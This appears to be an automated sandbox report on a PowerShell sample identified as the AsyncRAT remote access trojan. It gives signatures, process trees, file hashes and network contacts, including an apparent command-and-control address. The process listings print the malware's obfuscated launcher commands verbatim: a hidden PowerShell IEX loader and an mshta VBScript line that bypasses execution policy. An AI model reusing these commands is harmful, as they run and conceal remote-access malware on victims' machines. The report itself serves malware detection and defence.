Analysis Overview
SHA256
c671d25e21e83929c1853e697f29b0e8ed3b69edc6add61d4d8b8bc2018afe14
Threat Level: Known bad
The file 390Z21.ps1 was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-22 13:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-22 13:58
Reported
2023-03-22 14:00
Platform
win7-20230220-en
Max time kernel
30s
Max time network
33s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 920 wrote to memory of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe |
| PID 1612 wrote to memory of 1928 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\390Z21.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\BT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$BLNLS='ReadAllText';$T='C:\ProgramData\Document\BT.ps1';IEx([<#1#>IO.File<#1#>]::$BLNLS($T))}
Network
Files
C:\ProgramData\Document\BT.vbs
| MD5 | d81d9785f8a33a52adbf7761bb81483c |
| SHA1 | c7f97c27e4ad633369c9eca1be36335356486727 |
| SHA256 | cd30619863fb29e056c285521902eda2d820052f5cbc7a5d92ad331eab6460c4 |
| SHA512 | 0c08b68c6b64a57ba4494e20b5c840f3f013aa2873d03aa1d2a017c707614479afe024cfd1cdde17851d0f36cfc34a895eea1e41d4a4118067ec366c19bf41cf |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fad44b01e866d0051a92d87f4efdcd11 |
| SHA1 | 5621d7f2112244eeddeb808c90228f186912f104 |
| SHA256 | 6773394ae74f2281eec983ab592741f74ee367457111687bd3298fbf2d061c4b |
| SHA512 | de7f1db7409a0315c0b36001435a8dc2e03789b8b37b2a11adc9a85919a6f06901a7c975a864f2303ca1b5136e51ba534f38ffc8046d5c0b2993574cb84a4c16 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-22 13:58
Reported
2023-03-22 14:00
Platform
win10v2004-20230220-en
Max time kernel
90s
Max time network
151s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1236 set thread context of 1936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\390Z21.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\BT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$BLNLS='ReadAllText';$T='C:\ProgramData\Document\BT.ps1';IEx([<#1#>IO.File<#1#>]::$BLNLS($T))}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\schtasks\Document.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Document\Loader.bat" "
C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powe"+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+"rshell -Execu"+"tionP"+"olicy"+" Bypass & 'C:\ProgramData\Document\Document.ps1'"", 0:close")
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\ProgramData\Document\Document.ps1'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.145.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.38.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| FR | 185.81.157.244:6601 | N/A | tcp |
| US | 8.8.8.8:53 | 244.157.81.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 52.168.112.66:443 | N/A | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olm0lpyo.syo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\ProgramData\Document\BT.vbs
| MD5 | d81d9785f8a33a52adbf7761bb81483c |
| SHA1 | c7f97c27e4ad633369c9eca1be36335356486727 |
| SHA256 | cd30619863fb29e056c285521902eda2d820052f5cbc7a5d92ad331eab6460c4 |
| SHA512 | 0c08b68c6b64a57ba4494e20b5c840f3f013aa2873d03aa1d2a017c707614479afe024cfd1cdde17851d0f36cfc34a895eea1e41d4a4118067ec366c19bf41cf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/4984-156-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
memory/4984-162-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 27fdb1beb89b56345e585d480be3026b |
| SHA1 | 2626e41ca27668518d01c04e1579f77027ff31a1 |
| SHA256 | ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2 |
| SHA512 | bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a |
C:\ProgramData\Document\BT.ps1
| MD5 | a185048be8e4dcc4af37a21033364350 |
| SHA1 | 6203dd67cf4e9958d52fe7fb8dd34e2364416046 |
| SHA256 | 3311eb6e7226e8e21c3ae7b3f29c9859d0be7b10736cb3883d5c453f59a41583 |
| SHA512 | 75b51d7cadfcd656d92431848809f62e3c902f20ddd36665eec41d92d622b62f4830b04094052df9c7fb8b827b0dad8d4589dbacb1e5c4bee65bbbc794c7d32c |
memory/4984-170-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
C:\ProgramData\schtasks\Document.vbs
| MD5 | 3fdf59c6cc932ccfb273ee77a5338509 |
| SHA1 | dc0bfd3323aff0fdabd00f98496f30cb1a2aee5f |
| SHA256 | d8ded725a6dec74218c880a7c80c20755efecb0a8e3d82d5fae5963652c215e4 |
| SHA512 | e049dc02cc84139cd775fc1bfb901574b8fb2aff393a8da696f2602c8adda17bb0dfb62c19a31d8b15ade2179b5e54c41deacb3b01d785d1cb621dc0a0a0aa80 |
C:\ProgramData\Document\Loader.bat
| MD5 | aaff07ba1501352dabd41d75b0e8bb4f |
| SHA1 | d55ed9a18b657313801b7da2e2e5d79b1c0ae033 |
| SHA256 | b74497ce30b1a5e218bdad0bec6bd9ab24f38ab6881fa52c9f651f418bf6dc7a |
| SHA512 | 5afe35b094429427fd0c8e7194baa497d43c64a4d4a195e5789a145ab0ddc608a29e941f66d9dee2ded3e0253d501676c4632076bf6e5897383fc240a4d0f333 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70595b5937369a2592a524db67e208d3 |
| SHA1 | d989b934d9388104189f365694e794835aa6f52f |
| SHA256 | be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8 |
| SHA512 | edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5 |
C:\ProgramData\Document\Document.ps1
| MD5 | 6e7968ef23d12120b090badbb5ab6c68 |
| SHA1 | a15cf14da3192a7e64fbd0e9ea90ad2c2ab03f18 |
| SHA256 | 05593d5c9e42cc15217ca2db5c27a955aa2cedae87c9471b2181aad36ca8edaa |
| SHA512 | 8d120fd8859ff68103a35fb342c799045cda3f92a039b844cfab18fd75f7a831afca2b95e68aadf864207b46eb40d8b96d5ba7fb44c2a1cf7d2c947fdcad929c |